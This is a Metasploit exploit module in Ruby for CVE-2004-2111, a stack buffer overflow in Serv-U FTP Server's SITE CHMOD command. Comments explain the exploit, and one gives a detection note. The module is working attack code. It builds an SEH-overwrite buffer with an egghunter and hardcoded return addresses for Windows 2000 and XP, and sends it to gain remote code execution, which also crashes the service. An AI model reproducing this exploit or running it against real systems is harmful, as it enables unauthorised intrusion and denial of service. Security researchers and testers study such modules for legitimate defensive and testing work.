##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for CVE-2004-2111: a stack buffer overflow in the
  # Serv-U FTP Server SITE CHMOD handler, affecting versions prior to 4.2
  # according to the module description. Exploitation requires valid FTP
  # credentials, and the description warns that it leaves the service in a
  # non-functional state, so a successful run is also a denial of service
  # against the target.
  Rank = NormalRanking

  # Egghunter provides generate_egghunter; Ftp provides connect,
  # connect_login, send_cmd, banner and disconnect used below.
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::Ftp

  # Registers module metadata: references, payload constraints (the
  # BadChars list the encoder must avoid; DisableNops => true, with the
  # padding instead produced explicitly in #exploit via make_nops), and
  # two targets that differ only in the SEH return address ('Ret') and the
  # distance to the SEH record ('Offset'). Reliability, stability and side
  # effects are left unrated (UNKNOWN_*).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Serv-U FTP Server Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the site chmod command
          in versions of Serv-U FTP Server prior to 4.2.

          You must have valid credentials to trigger this vulnerability. Exploitation
          also leaves the service in a non-functional state.
        },
        'Author' => 'theLightCosine',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-2111'],
          [ 'OSVDB', '3713'],
          [ 'BID', '9483'],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          'DisableNops' => true,
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows 2000 SP0-4 EN', {
              'Ret' => 0x750212bc, # WS2HELP.DLL
              'Offset' => 396
            }
          ],
          [
            'Windows XP SP0-1 EN', {
              'Ret' => 0x71aa388f, # WS2HELP.DLL
              'Offset' => 394
            }
          ]
        ],
        'DisclosureDate' => '2004-12-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Banner-only version check. Connects and disconnects, then matches the
  # banner (presumably captured by the Ftp mixin's connect — confirm there)
  # against a version pattern. Returns Appears for banners advertising
  # 3.x, 4.0 or 4.1; everything else reports Safe, including releases
  # older than 3.0 even though the "prior to 4.2" wording above covers them.
  # The dots in the regex are unescaped and so match any character, making
  # the match looser than the version strings it is meant to catch. This is
  # a version-string check only; it does not confirm exploitability.
  def check
    connect
    disconnect

    if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Authenticates with the configured credentials and aborts quietly when
  # connect_login fails. Otherwise builds the SITE CHMOD argument and sends
  # it, then hands control to the payload handler.
  #
  # Buffer layout: "chmod 777 " (10 bytes), NOP padding sized so that
  # padding + egg + egghunter total target['Offset'] bytes, the 4-byte nSEH
  # record, the 4-byte SEH pointer taken from target.ret packed as a 32-bit
  # little-endian value, then 5000 bytes of random filler — roughly 5.4 KB
  # in total (10 + Offset + 5008). The egghunter searches memory for the
  # "W00T"-tagged egg (checksum enabled) that carries the encoded payload.
  #
  # Detection note: the observable on the wire is an authenticated FTP
  # session issuing a SITE command with an argument of that size, followed
  # by the service failing.
  def exploit
    c = connect_login
    return if not c

    eggoptions =
      {
        :checksum => true,
        :eggtag => "W00T"
      }

    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

    buffer = "chmod 777 "
    buffer << make_nops(target['Offset'] - egg.length - hunter.length)
    buffer << egg
    buffer << hunter
    buffer << "\xeb\xc9\x41\x41" # nseh, jump back to egghunter
    buffer << [target.ret].pack('V') # seh
    buffer << rand_text(5000)

    print_status("Trying target #{target.name}...")

    # Second argument `false` presumably tells send_cmd not to wait for a
    # reply — confirm against the Ftp mixin.
    send_cmd(['SITE', buffer], false)

    handler
    disconnect
  end
end